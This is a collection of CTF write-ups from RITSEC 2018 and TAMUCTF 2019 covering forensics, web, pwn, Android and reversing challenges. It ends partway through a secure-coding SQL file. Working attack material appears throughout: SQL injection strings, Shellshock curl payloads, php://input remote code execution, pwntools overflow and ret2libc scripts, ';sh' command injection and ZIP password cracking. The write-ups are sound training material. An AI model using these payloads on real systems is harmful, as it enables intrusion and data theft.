├── README.md ├── RITSEC CTF 2018 ├── Forensics │ ├── Burn_The_Candle_On_Both_Ends.md │ └── I_am_a_Stegosaurus.md ├── Misc │ └── Music.png.md ├── README.md └── Web │ ├── Crazy_Train.md │ ├── Lazy_Dev.md │ ├── Space_Force.md │ ├── The_Tangled_Web.md │ └── What_A_Cute_Dog.md ├── TAMUCTF 2019 ├── Android │ └── localNews.md ├── Pentest │ ├── StopAndListen.md │ └── image-stopAndListen │ │ ├── follow.png │ │ └── udp-traffic.png ├── Pwn │ ├── pwn1.md │ ├── pwn2.md │ ├── pwn4.md │ └── pwn5.md ├── Reverse │ └── 042.md ├── Secure Coding │ ├── SQL.md │ ├── loginapp2.md │ ├── pwn.md │ └── science.md └── Web │ ├── images │ └── loginapp2-request.png │ └── loginapp2.md └── TUCTF 2018 ├── Misc └── hardDOS.md ├── README.md ├── Reverse ├── Danger_Zone.md └── YeahRight.md └── Web ├── Colonel_Mustard's_Simple_Signin.md ├── Easter_Egg:_Copper_Gate.md ├── Easter_Egg:_Crystal_Gate.md ├── Easter_Egg:_Jade_Gate.md ├── Miss_Scarlet's_Resume_Requests.md ├── Mr._Green's_Weird_Website.md ├── Mrs._White's_Messy_Maids.md └── Professor_Plum's_Ravenous_Researcher.md /README.md: -------------------------------------------------------------------------------- 1 | # Writeups 2 | Different writeups and solutions of all CTF Contests that we've played! 3 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Forensics/Burn_The_Candle_On_Both_Ends.md: -------------------------------------------------------------------------------- 1 | ## Burn The Candle On Both Ends - Forensics 150: 2 | 3 | **Description:** It's a two step problem 4 | **Challenge:** candle.jpg 5 | **Difficulty:** Easy 6 | **Solved by:** Eric & Tahar 7 | 8 | **Solution:** 9 | Downloaded the challenge file and used the **file** command in the Linux terminal to identify it! It was a normal JPG Image! 10 | By using the famous forensics toolkit **Binwalk** we find an interesting ZIP file embeded into the main challenge file! 11 | ```binwalk candle.jpg``` 12 | 13 | We start by extracting that ZIP file from the challenge file, we have too many tricks to do that, we can use a **Hex Editor** and get out the hex data into a new zip file or we can use **DD** or just the same toolkit **Binwalk** or by using **Foremost** (another well known digital forensics tool). By using **Binwalk** we use the following command: 14 | ```binwalk -e candle.jpg``` 15 | 16 | After, that we got an **Encrypted ZIP Archive**, the description did not say anything, but it mentioned that this a Two Step challenge, so we done the first step which is extracting the Hidden ZIP File! And the second step is probably bruteforcing that ZIP Archive!! 17 | 18 | We use the well known **Rockyou Wordlist** to bruteforce the ZIP Archive, **fcrackzip** did not work, so we thought about using another well known toolkit under the name of **John The Ripper** it is a well known password & hash cracking toolkit! 19 | We used a toolkit **zip2john** to get the hash of that ZIP Archive using the command: ```zip2john archive.zip > hash.txt``` 20 | 21 | Then, we got a HASH, time to crack it using **Rockyou & John**. We run the following command to launch the **BruteForce Attack**: ``` john --wordlist=rockyou.txt --format=zip hash.txt``` 22 | 23 | Successsful Attack, password: **stegosaurus** 24 | 25 | Now, it is time to grab the flag by extracting the **flag.txt** file from the Decrypted ZIP Archive =) 26 | 27 | **Flag:** 28 | RITSEC{8U51N355–1N-7H3-Fr0N7-P4r7Y-1N-7H3–84CK} 29 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Forensics/I_am_a_Stegosaurus.md: -------------------------------------------------------------------------------- 1 | ## I am a Stegosaurus - Forensics 250: 2 | 3 | **Description:** Look Closely 4 | **Challenge:** stegosaurus.png 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar & Eric 7 | 8 | **Solution:** 9 | Honestly, I was use Windows with Virtualization Software (Workstation & VBox) so I downloaded the file using Windows, and I just opened it and got the Flag x"D so funny!! 10 | 11 | But, my Team Mate **Eric** used and Linux and the image did not work, and he wrote the right solution for this challenge! Check his detailed writeup out!! 12 | https://medium.com/@thereallulz/writeup-ritsec-ctf-2018-forensics-by-thereallulz-eb06196e7ae1#c58d 13 | 14 | **Flag:** 15 | RITSEC{th1nk_0uts1d3_th3_b0x} 16 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Misc/Music.png.md: -------------------------------------------------------------------------------- 1 | ## Music.png - Misc 300: 2 | 3 | **Description:** Name that tune 4 | **Challenge:** music.png 5 | **Difficulty:** Medium 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We start by downloading the challenge file and opening it, we see some kind of random colors & points! I have been trying to do many tricks that I used to do with Steganography challenges before! None worked, I asked for help and a friend gave me a hint, he said only one Word that let me work on it till the end! 10 | 11 | My friend said: LSB. It means the "**Least Significant Bit**", and I was able to start working on it by just using this little ONE-WORD hint! I always use a well known toolkit for LSB-Challenges, the name is **Zsteg** and you can find it on Github! I downloaded the tool and installed it on my VM Box to start solving the challenge. 12 | 13 | I started running the **zsteg** toolkit and used the following command: ```zsteg -all music.png```, and got some kind of weird text replying in the whole output of the toolkit! That was actually an interesting thing to look for. 14 | 15 | I started by **Googling** for that output text, and found out that it was a Music :3 **https://jhirniak.github.io/Never-Gonna-Rick-You-Up/index.html** 16 | 17 | I Googled again using the name that was appearing in the **URL** ```Never-Gonna-Rick-You-Up``` and I found out another well known music (Following the Challenge Description: **Name the Tune**). So probably the name of that tune is the flag that we are looking for! 18 | 19 | I made my flag and solved that challenge that took me a lot of time and overthinking =) 20 | **https://www.youtube.com/watch?v=dQw4w9WgXcQ** 21 | 22 | **Flag:** 23 | RITSEC{never_gonna_give_you_up} 24 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/README.md: -------------------------------------------------------------------------------- 1 | ## RITSEC CTF 2018: 2 | RITSEC CTF 2018 is a security-focused competition that features the following categories: Binary, Crypto, Forensics, Programming, and Web. We welcome beginners and more advanced security friends! There will be three brackets: RIT students, other college students, and everyone else. 3 | 4 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Web/Crazy_Train.md: -------------------------------------------------------------------------------- 1 | ## Crazy Train - Web 250: 2 | 3 | **Description:** N/A 4 | **Challenge:** fun.ritsec.club:3000 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar Amine ELHOUARI 7 | 8 | **Solution:** 9 | We are presented with a web application that is based on **Ruby on Rails**, it is all about posting and submiting articles to the App!! 10 | When we try to submit an article, we are given two inputs to write in. The team took too much time, until I released that there is a hidden third input in the page. I have seen too many people (Probably Indians) trying to XSS the App, but I know that most of CTF contests doesn't have XSS in web challenges! It is a useless vulnerability in most of CTFs. So, I thought it is probably a command injection or probably an RCE. A friend from another team hinted me and told me that you are close, but there is a hidden input so I started trying with Command Injection but I did not succeed! 11 | 12 | Later, I started trying to exploit an RCE **Remote Code Execution**, It didn't work but the friend told me I am close! I remembered something, that this is a **Ruby on Rails** Challenge and not a PHP Web App Challenge, so I started thinking that exploitation payloade must be different because it is different language and different syntax! I started googling as usual and looking for guides about Web Application Hacking/Security in Web Apps that are based on Ruby on Rails, and I think that is the reason of the name of that challenge being named **Crazy Train**, because it is Crazy and Train refer to the Rails. 13 | After, googling I get to know how to exploita an RCE vulnerability and I succeeded using the following payload: **`cat flag.txt`** 14 | 15 | Note: I couldn't write the right payload of MD of github! Use **ALT GR + Number 7** in your keyboard to get the characters that I have used before & after **cat flag.txt** 16 | It is something like this ' cat flag.txt ' I hope you got my point!! 17 | 18 | **Flag:** 19 | RITSEC{W0wzers_who_new_3x3cuting_c0de_to_debug_was_@_bad_idea} 20 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Web/Lazy_Dev.md: -------------------------------------------------------------------------------- 1 | ## Lazy Dev - Web 400: 2 | 3 | **Description:** N/A 4 | **Challenge:** fun.ritsec.club:8007 5 | **Difficulty:** Easy 6 | **Solved by:** Milan 7 | 8 | **Solution:** 9 | The final web challenge with a link: **http://fun.ritsec.club:8007**. 10 | Hmm it takes us back to The tangled web challenge. At first, I was thinking that it was a mistake, but after reviewing all pages I crawled, I saw a comment which lead us further. Comment was found in **http://fun.ritsec.club:8007/Stars.html** and it goes like this: 11 | 12 | **<-- REMOVE THIS NOTE LATER -->** 13 | **<-- Getting remote access is so much work. Just do fancy things on devsrule.php -->** 14 | 15 | So I went to http://fun.ritsec.club:8007/devsrule.php and I am welcomed with: 16 | **Not what you input eh?** 17 | **This param is 'magic' man.** 18 | **Well, it is said that the parameter is magic.** 19 | 20 | I started poking around and after a while I finally figured out that it is LFI to RCE ! We have to use **php://input wrapper** ! 21 | 22 | I intercepted the **GET request with Burp Suite** and changed to **POST /devsrule.php?magic=php://input HTTP/1.1** 23 | Next thing was to add **POST data** so I ran `````` and I got this response: 24 | **Not what you input eh?** 25 | **This param is 'magic' man.** 26 | **uid=33(www-data) gid=33(www-data) groups=33(www-data)** 27 | 28 | Next step was to find the flag. With simple poking around we found our flag in **/home/joker/flag.txt** 29 | To read flag we execute `````` and we got flag in response! 30 | 31 | **Flag:** 32 | RITSEC{WOW_THAT_WAS_A_PAIN_IN_THE_INPUT} 33 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Web/Space_Force.md: -------------------------------------------------------------------------------- 1 | ## Space Force - Web 100: 2 | 3 | **Description:** The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. 4 | **Challenge:** fun.ritsec.club:8005 5 | **Difficulty:** Easy 6 | **Solved by:** Milan 7 | 8 | **Solution:** 9 | We are provided with an URL: http://fun.ritsec.club:8005/ 10 | When we open the challenge, we can see that we are presented with Ship leaderboard If we enter one of the presented ships, we can see its records. If we type **'**, the text changed to **Something went wrong with your record query! What are you trying to do???** Which clearly indicates that this is an SQL injection Vulnerability! 11 | 12 | We can just query all records by using the following payload: **' or 'x'='x** 13 | 14 | **Flag:** 15 | RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx} 16 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Web/The_Tangled_Web.md: -------------------------------------------------------------------------------- 1 | ## The Tangled Web - Web 200: 2 | 3 | **Description:** N/A 4 | **Challenge:** fun.ritsec.club:8007 5 | **Difficulty:** Easy 6 | **Solved by:** Milan 7 | 8 | **Solution:** 9 | The main thing here was to **crawl complete webpage and inspect responses**. I used **Burp Suite** for that task. At first, URL that was different was **http://fun.ritsec.club:8007/Fl4gggg1337.html**, unfortunately, that was a troll. 10 | Second thing that is worth paying attention was **http://fun.ritsec.club:8007/Stars.html**. It contains a paragraph that is **encoded in base64**. 11 | 12 | **UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0=**, we can decode this using Decoder tab in Burp Suite or running this command in terminal: **echo "UklUU0VDe0FSM19ZMFVfRjMzNzFOR18xVF9OMFdfTVJfS1I0QjU/IX0=" | base64 -d**. 13 | The given output is the flag! 14 | 15 | **Flag:** 16 | RITSEC{AR3_Y0U_F3371NG_1T_N0W_MR_KR4B5?!} 17 | -------------------------------------------------------------------------------- /RITSEC CTF 2018/Web/What_A_Cute_Dog.md: -------------------------------------------------------------------------------- 1 | ## What a Cute Dog - Web 350: 2 | 3 | **Description:** This dog is shockingly cute! 4 | **Challenge:** fun.ritsec.club:8008 5 | **Difficulty:** Easy 6 | **Solved by:** Milan 7 | 8 | **Solution:** 9 | Upon opening the given URL, we see a shockingly cute dog ! And some stats: **Mon Nov 19 11:06:51 UTC 2018 11:06:51 up 2 days, 18:54, 0 users, load average: 0.00, 0.00, 0.03**. 10 | Inspecting the source we see an interesting link: **http://fun.ritsec.club:8008/cgi-bin/stats**. Googling this, we found an exploit for stats. And guess what, it is a **shellshock exploit (CVE 2014-6271)**. 11 | 12 | We are going to use this command for finding the flag: **curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'uname -a;'" http://fun.ritsec.club:8008/cgi-bin/stats** 13 | 14 | After some time for searching the flag, I remembered that flag it is always named like **flag.txt**. So I ran this command in terminal to get the exact location of a flag: 15 | **curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats** 16 | 17 | **flag.txt** was found in **/opt/** folder. The final step we needed to take was to read the flag. 18 | **curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats** 19 | 20 | **Flag:** 21 | RITSEC{sh3ll_sh0cked_w0wz3rs} 22 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Android/localNews.md: -------------------------------------------------------------------------------- 1 | ## Local News - Android 2 | 3 | **Description:** Be sure to check your local news broadcast for the latest updates! 4 | **Challenge:** : app.apk 5 | **Difficulty:** medium-hard 6 | **Solved by:** Neolex 7 | 8 | **Solution:** 9 | The challenge give us an **apk**, this is the format of an **android application**. 10 | I used **jadx** to analyze the decompiled code of the apk : 11 | ``` 12 | $ jadx-gui --deobf ./app.apk 13 | ``` 14 | Let's look at the **MainActivity** code : 15 | ```java 16 | public class MainActivity extends AppCompatActivity { 17 | 18 | /* renamed from: com.tamu.ctf.hidden.MainActivity$1 */ 19 | class C00141 extends BroadcastReceiver { 20 | C00141() { 21 | } 22 | 23 | public void onReceive(Context context, Intent intent) { 24 | Log.d(MainActivity.this.getString(C0017R.string.flag), Deobfuscator$app$Debug.getString(0)); 25 | } 26 | } 27 | 28 | protected void onCreate(Bundle savedInstanceState) { 29 | super.onCreate(savedInstanceState); 30 | setContentView((int) C0017R.layout.activity_main); 31 | BroadcastReceiver hidden = new C00141(); 32 | IntentFilter filter = new IntentFilter(); 33 | filter.addAction(getString(C0017R.string.hidden_action)); 34 | LocalBroadcastManager.getInstance(this).registerReceiver(hidden, filter); 35 | } 36 | } 37 | ``` 38 | We can see a **BroadcastReceiver** being created, and the **onReceive** callback log the flag. I first thought I should trigger that callback but finally I decided to use **Frida** to run the function that returns the flag. 39 | Here is my frida script : 40 | ```javascript 41 | 'use strict;' 42 | 43 | if (Java.available) { 44 | Java.perform(function() { 45 | var deobf = Java.use('io.michaelrocks.paranoid.Deobfuscator$app$Debug'); 46 | var flag = deobf.getString(0); 47 | console.log('[+] flag: ' + flag); 48 | } 49 | )} 50 | ``` 51 | In this script I run the **getString** function of the **io.michaelrocks.paranoid.Deobfuscator\$app\$Debug** class with the arguments **0** like the BroadcastReceiver would do . 52 | I run the frida-server and the challenge's application on my android emulator and run this command to run the script : 53 | ``` 54 | $ frida -U com.tamu.ctf.hidden -l script.js 55 | ____ 56 | / _ | Frida 12.2.26 - A world-class dynamic instrumentation toolkit 57 | | (_| | 58 | > _ | Commands: 59 | /_/ |_| help -> Displays the help system 60 | . . . . object? -> Display information about 'object' 61 | . . . . exit/quit -> Exit 62 | . . . . 63 | . . . . More info at http://www.frida.re/docs/home/ 64 | Attaching... 65 | [+] flag: gigem{hidden_81aeb013bea} 66 | 67 | ``` 68 | **Flag:** 69 | gigem{hidden_81aeb013bea} 70 | 71 | 72 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Pentest/StopAndListen.md: -------------------------------------------------------------------------------- 1 | ## Stop and Listen - Network/Pentest 2 | 3 | **Description:** Sometimes you just need to stop and listen. 4 | This challenge is an introduction to our network exploit challenges, which are hosted over OpenVPN. 5 | **Challenge:** : listen.openvpn 6 | **Difficulty:** easy 7 | **Solved by:** Neolex 8 | 9 | **Solution:** 10 | This challenge gives us a openvpn script to connect to their network. 11 | Let's connect to the vpn with openvpn : ```sudo openvpn --config listen.ovpn ``` 12 | Now the challenge name tell us to listen so I use wireshark to see if there was some traffic on the network : 13 | we can see some UDP traffic : 14 | ![](./image-stopAndListen/udp-traffic.png) 15 | Let's follow the UDP stream : 16 | ![](./image-stopAndListen/follow.png) 17 | 18 | Here is the flag ! 19 | 20 | **Flag:** 21 | gigem{f0rty_tw0_c9d950b61ea83} 22 | 23 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Pentest/image-stopAndListen/follow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Pentest/image-stopAndListen/follow.png -------------------------------------------------------------------------------- /TAMUCTF 2019/Pentest/image-stopAndListen/udp-traffic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Pentest/image-stopAndListen/udp-traffic.png -------------------------------------------------------------------------------- /TAMUCTF 2019/Pwn/pwn1.md: -------------------------------------------------------------------------------- 1 | ## Pwn1 - Pwn 2 | 3 | **Description:** `nc pwn.tamuctf.com 4321` 4 | **Challenge:** : pwn1 5 | **Difficulty:** easy 6 | **Solved by:** Neolex 7 | 8 | **Solution:** 9 | This challenge is a simple **buffer overflow**. 10 | First, the binary ask us a question : 11 | "Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see. 12 | What... is your name?" 13 | we have to answer : "Sir Lancelot of Camelot" 14 | then, another one: "What... is your quest?" 15 | we answer : "To seek the Holy Grail." 16 | Then the question is : "What... is my secret?" 17 | and the call to read the answer is not fgets this time but **gets** which is a vulnerable function (see ```man gets```: 18 | ``` 19 | BUGS 20 | Never use gets(). Because it is impossible to tell without knowing the data in advance how many 21 | characters gets() will read, and because gets() will continue to store characters past the end 22 | of the buffer, it is extremely dangerous to use. It has been used to break computer security. 23 | Use fgets() instead 24 | 25 | ``` 26 | If we enter "A"*43+"BBBB" the binary returns to 0x42424242 which is our B's : we control the execution. 27 | Fortunaly the binary gives us a function "print_flag" at address 0xdea110c8 which prints the content of the file flag.txt. 28 | So here is our exploit script 29 | ```python 30 | from pwn import * 31 | 32 | # p = process('./pwn1') 33 | p = remote('wn.tamuctf.com',4321) 34 | 35 | p.recvuntil("name?") 36 | p.sendline("Sir Lancelot of Camelot") 37 | p.recvuntil("quest?") 38 | p.sendline("To seek the Holy Grail.") 39 | p.recvuntil("secret?") 40 | 41 | payload = "A"*43 42 | payload += p32(0xdea110c8) 43 | 44 | p.sendline(payload) 45 | print p.recvall() 46 | ``` 47 | Let's run it : 48 | ``` 49 | $ python exploit.py 50 | [+] Opening connection to wn.tamuctf.com on port 4321: Done 51 | [+] Receiving all data: Done (50B) 52 | [*] Closed connection to wn.tamuctf.com port 4321 53 | 54 | Right. Off you go. 55 | gigem{34sy_CC428ECD75A0D392} 56 | ``` 57 | 58 | **Flag:** 59 | gigem{34sy_CC428ECD75A0D392} 60 | 61 | 62 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Pwn/pwn2.md: -------------------------------------------------------------------------------- 1 | ## Pwn2 - Pwn 2 | 3 | **Description:** ```nc pwn.tamuctf.com 4322``` 4 | **Challenge:** : pwn2 5 | **Difficulty:** easy 6 | **Solved by:** Neolex 7 | 8 | **Solution:** 9 | First the binary ask us a question : "Which function would you like to call?" 10 | Let's send a lot of A's : the programs **segfault** at address **0x56555641** 11 | the 41 is the byte we controlled in the address we call because 0x41 is the ascii value of "A". 12 | Let's run the function print_flag which is at 0x565556d8 : 13 | ``` 14 | gdb-peda$ p print_flag 15 | $1 = {} 0x565556d8 16 | ``` 17 | so we just have to send a lot of 0xd8 to call the print_flag function : 18 | ```python 19 | from pwn import * 20 | 21 | p = remote('wn.tamuctf.com', 4322) 22 | p.sendline('\xd8'*500) 23 | print p.recvall() 24 | ``` 25 | let's run it : 26 | ``` 27 | $ python exploit.py 28 | [+] Opening connection to wn.tamuctf.com on port 4322: Done 29 | [+] Receiving all data: Done (109B) 30 | [*] Closed connection to wn.tamuctf.com port 4322 31 | Which function would you like to call? 32 | This function is still under development. 33 | gigem{4ll_17_74k35_15_0n3} 34 | ``` 35 | we got the flag ! 36 | 37 | **Flag:** 38 | gigem{4ll_17_74k35_15_0n3} 39 | 40 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Pwn/pwn4.md: -------------------------------------------------------------------------------- 1 | ## Pwn4 - Pwn 2 | 3 | **Description:** ```nc pwn.tamuctf.com 4324``` 4 | **Challenge:** : pwn4 5 | **Difficulty:** medium 6 | **Solved by:** Neolex 7 | 8 | **Solution:** 9 | The vulnerability is, again, a call to the vulnerable **gets** function. We need 37 bytes to be send to overwrite the return address. This time we don't have a print_flag function so we're going to use ret2libc to call **system** with the **/bin/sh** strings : 10 | Let's find a call to system : 11 | ``` 12 | .text:080485AD call _system 13 | ``` 14 | The address is 0x080485AD. now let's find an adress of a **/bin/sh** function in GDB : 15 | ``` 16 | gdb-peda$ searchmem /bin/sh 17 | Searching for '/bin/sh' in: None ranges 18 | Found 2 results, display max 2 items: 19 | pwn4 : 0x804a034 ("/bin/sh") 20 | ``` 21 | the address is 0x804a034 22 | Here is the exploit code : 23 | ```python 24 | from pwn import * 25 | 26 | system = 0x080485AD 27 | binsh = 0x804a034 28 | 29 | p = remote('pwn.tamuctf.com', 4324) 30 | p.recvuntil('ls:') 31 | 32 | payload = "A"*37 33 | payload += p32(system) 34 | payload += p32(binsh) 35 | p.sendline(payload) 36 | p.interactive() 37 | ``` 38 | run the exploit : 39 | ``` 40 | $ python exploit.py 41 | [+] Opening connection to pwn.tamuctf.com on port 4324: Done 42 | [*] Switching to interactive mode 43 | 44 | Result of ls AAAAAAAAAAAAAAAAAAAAAAA: 45 | $ ls 46 | flag.txt 47 | pwn4 48 | $ cat flag.txt 49 | gigem{5y573m_0v3rfl0w} 50 | ``` 51 | **Unintended Solution:** 52 | the was an unintended solution to this challenge by just sending : ";sh" and we get a shell. 53 | The issue here was that the input was print inside the string "ls %s" so if we stop the ls command with **;** and call sh command we get a shell : 54 | ``` 55 | $ nc pwn.tamuctf.com 4324 56 | ls as a service (laas)(Copyright pending) 57 | Enter the arguments you would like to pass to ls: 58 | ;sh 59 | Result of ls ;sh: 60 | flag.txt 61 | pwn4 62 | ls 63 | flag.txt 64 | pwn4 65 | cat flag.txt 66 | gigem{5y573m_0v3rfl0w} 67 | ``` 68 | **Flag:** 69 | gigem{5y573m_0v3rfl0w} 70 | 71 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Pwn/pwn5.md: -------------------------------------------------------------------------------- 1 | ## Pwn5 - Pwn 2 | 3 | **Description:** ````nc pwn.tamuctf.com 4325```` 4 | **Challenge:** : pwn5 5 | **Difficulty:** medium 6 | **Solved by:** Neolex 7 | 8 | **Solution:** 9 | Here I used an unintended solution by just sending : ";sh" and we get a shell. 10 | The issue here was that the input was print inside the string "ls %s" is the **run_cmd** function so if we stop the ls command with **;** and call sh command we get a shell : 11 | ``` 12 | $ nc pwn.tamuctf.com 4325 13 | ls as a service (laas)(Copyright pending) 14 | Version 2: Less secret strings and more portable! 15 | Enter the arguments you would like to pass to ls: 16 | ;sh 17 | Result of ls ;sh: 18 | flag.txt 19 | pwn5 20 | cat flag.txt 21 | gigem{r37urn_0r13n73d_pr4c71c3} 22 | ``` 23 | **Flag:** 24 | gigem{r37urn_0r13n73d_pr4c71c3} 25 | 26 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Reverse/042.md: -------------------------------------------------------------------------------- 1 | ## 042 - Reversing 2 | 3 | **Description:** Cheers for actual assembly! 4 | **Difficulty:** Medium 5 | **Solved by:** Neolex 6 | 7 | **Solution:** 8 | The challenge give us an assembly script : 9 | ```asm .section __TEXT,__text,regular,pure_instructions 10 | .build_version macos, 10, 14 11 | .globl _concat ## -- Begin function concat 12 | .p2align 4, 0x90 13 | _concat: ## @concat 14 | .cfi_startproc 15 | ## %bb.0: 16 | pushq %rbp 17 | .cfi_def_cfa_offset 16 18 | .cfi_offset %rbp, -16 19 | movq %rsp, %rbp 20 | .cfi_def_cfa_register %rbp 21 | subq $48, %rsp 22 | movq %rdi, -8(%rbp) 23 | movq %rsi, -16(%rbp) 24 | movq -8(%rbp), %rdi 25 | callq _strlen 26 | movq -16(%rbp), %rdi 27 | movq %rax, -32(%rbp) ## 8-byte Spill 28 | callq _strlen 29 | movq -32(%rbp), %rsi ## 8-byte Reload 30 | addq %rax, %rsi 31 | addq $1, %rsi 32 | movq %rsi, %rdi 33 | callq _malloc 34 | movq $-1, %rdx 35 | movq %rax, -24(%rbp) 36 | movq -24(%rbp), %rdi 37 | movq -8(%rbp), %rsi 38 | callq ___strcpy_chk 39 | movq $-1, %rdx 40 | movq -24(%rbp), %rdi 41 | movq -16(%rbp), %rsi 42 | movq %rax, -40(%rbp) ## 8-byte Spill 43 | callq ___strcpy_chk 44 | movq -24(%rbp), %rdx 45 | movq %rax, -48(%rbp) ## 8-byte Spill 46 | movq %rdx, %rax 47 | addq $48, %rsp 48 | popq %rbp 49 | retq 50 | .cfi_endproc 51 | ## -- End function 52 | .globl _main ## -- Begin function main 53 | .p2align 4, 0x90 54 | _main: ## @main 55 | .cfi_startproc 56 | ## %bb.0: 57 | pushq %rbp 58 | .cfi_def_cfa_offset 16 59 | .cfi_offset %rbp, -16 60 | movq %rsp, %rbp 61 | .cfi_def_cfa_register %rbp 62 | subq $80, %rsp 63 | leaq L_.str(%rip), %rdi 64 | movl $3, %eax 65 | movl $14, %ecx 66 | xorl %esi, %esi 67 | movl $8, %edx 68 | ## kill: def %rdx killed %edx 69 | leaq -16(%rbp), %r8 70 | movq ___stack_chk_guard@GOTPCREL(%rip), %r9 71 | movq (%r9), %r9 72 | movq %r9, -8(%rbp) 73 | movl $0, -20(%rbp) 74 | movq %rdi, -56(%rbp) ## 8-byte Spill 75 | movq %r8, %rdi 76 | movl %ecx, -60(%rbp) ## 4-byte Spill 77 | movl %eax, -64(%rbp) ## 4-byte Spill 78 | callq _memset 79 | movb $65, -16(%rbp) 80 | movb $53, -15(%rbp) 81 | movb $53, -14(%rbp) 82 | movb $51, -13(%rbp) 83 | movb $77, -12(%rbp) 84 | movb $98, -11(%rbp) 85 | movb $49, -10(%rbp) 86 | movb $89, -9(%rbp) 87 | movl $0, -28(%rbp) 88 | movl $1, -32(%rbp) 89 | movl $2, -36(%rbp) 90 | movl -36(%rbp), %eax 91 | imull -36(%rbp), %eax 92 | imull -36(%rbp), %eax 93 | movl -28(%rbp), %ecx 94 | addl -32(%rbp), %ecx 95 | addl -32(%rbp), %ecx 96 | addl -32(%rbp), %ecx 97 | imull %ecx, %eax 98 | cltd 99 | movl -60(%rbp), %ecx ## 4-byte Reload 100 | idivl %ecx 101 | movl %eax, -40(%rbp) 102 | movl -36(%rbp), %eax 103 | imull -36(%rbp), %eax 104 | imull -36(%rbp), %eax 105 | movl -28(%rbp), %esi 106 | addl -32(%rbp), %esi 107 | addl -32(%rbp), %esi 108 | imull %esi, %eax 109 | cltd 110 | movl -64(%rbp), %esi ## 4-byte Reload 111 | idivl %esi 112 | movl %eax, -44(%rbp) 113 | movl -40(%rbp), %esi 114 | movq -56(%rbp), %rdi ## 8-byte Reload 115 | movb $0, %al 116 | callq _printf 117 | leaq L_.str.1(%rip), %rdi 118 | movl -44(%rbp), %esi 119 | movl %eax, -68(%rbp) ## 4-byte Spill 120 | movb $0, %al 121 | callq _printf 122 | leaq L_.str.2(%rip), %rdi 123 | leaq -16(%rbp), %rsi 124 | movl %eax, -72(%rbp) ## 4-byte Spill 125 | movb $0, %al 126 | callq _printf 127 | movq ___stack_chk_guard@GOTPCREL(%rip), %rsi 128 | movq (%rsi), %rsi 129 | movq -8(%rbp), %rdi 130 | cmpq %rdi, %rsi 131 | movl %eax, -76(%rbp) ## 4-byte Spill 132 | jne LBB1_2 133 | ## %bb.1: 134 | xorl %eax, %eax 135 | addq $80, %rsp 136 | popq %rbp 137 | retq 138 | LBB1_2: 139 | callq ___stack_chk_fail 140 | ud2 141 | .cfi_endproc 142 | ## -- End function 143 | .section __TEXT,__cstring,cstring_literals 144 | L_.str: ## @.str 145 | .asciz "The answer: %d\n" 146 | 147 | L_.str.1: ## @.str.1 148 | .asciz "Maybe it's this:%d\n" 149 | 150 | L_.str.2: ## @.str.2 151 | .asciz "gigem{%s}\n" 152 | 153 | 154 | .subsections_via_symbols 155 | 156 | ``` 157 | I choose to not revere the whole assembly script but just this parts which looks like the flag : 158 | ``` movb $65, -16(%rbp) 159 | movb $53, -15(%rbp) 160 | movb $53, -14(%rbp) 161 | movb $51, -13(%rbp) 162 | movb $77, -12(%rbp) 163 | movb $98, -11(%rbp) 164 | movb $49, -10(%rbp) 165 | movb $89, -9(%rbp) 166 | movl $0, -28(%rbp) 167 | movl $1, -32(%rbp) 168 | movl $2, -36(%rbp) 169 | ``` 170 | This part of the assemby code set the flag with ascii values , here is a little python script to get the flag : 171 | ``` 172 | flag = "gigem{" 173 | flag += "".join(chr(i) for i in [65,53,53,51,77,98,49,89]) 174 | flag += "}" 175 | print flag 176 | ``` 177 | 178 | **Flag:** 179 | gigem{A553Mb1Y} 180 | 181 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Secure Coding/SQL.md: -------------------------------------------------------------------------------- 1 | ## SQL - Secure Coding 2 | 3 | **Challenge:** : [https://gitlab.tamuctf.com/root/sql](https://gitlab.tamuctf.com/root/sql) 4 | **Difficulty:**: easy 5 | **Solved by:** Neolex 6 | 7 | **Solution:** 8 | The goal of this challenge is to secure the vulnerable script of the web challenge "Not Another SQLi Challenge" . 9 | Here is the vulnerable script : 10 | ```php 11 | "; 15 | if (isset($_POST["username"]) && isset($_POST["password"])) { 16 | $servername = "localhost"; 17 | $username = "sqli-user"; 18 | $password = 'AxU3a9w-azMC7LKzxrVJ^tu5qnM_98Eb'; 19 | $dbname = "SqliDB"; 20 | $conn = new mysqli($servername, $username, $password, $dbname); 21 | if ($conn->connect_error) 22 | die("Connection failed: " . $conn->connect_error); 23 | $user = $_POST['username']; 24 | $pass = $_POST['password']; 25 | $sql = "SELECT * FROM login WHERE User='$user' AND Password='$pass'"; 26 | if ($result = $conn->query($sql)) 27 | { 28 | if ($result->num_rows >= 1) 29 | { 30 | $row = $result->fetch_assoc(); 31 | echo "You logged in as " . $row["User"]; 32 | $row = $result->fetch_assoc(); 33 | echo "You logged in as " . $row["User"] . "\n"; 34 | } 35 | else { 36 | echo "Sorry to 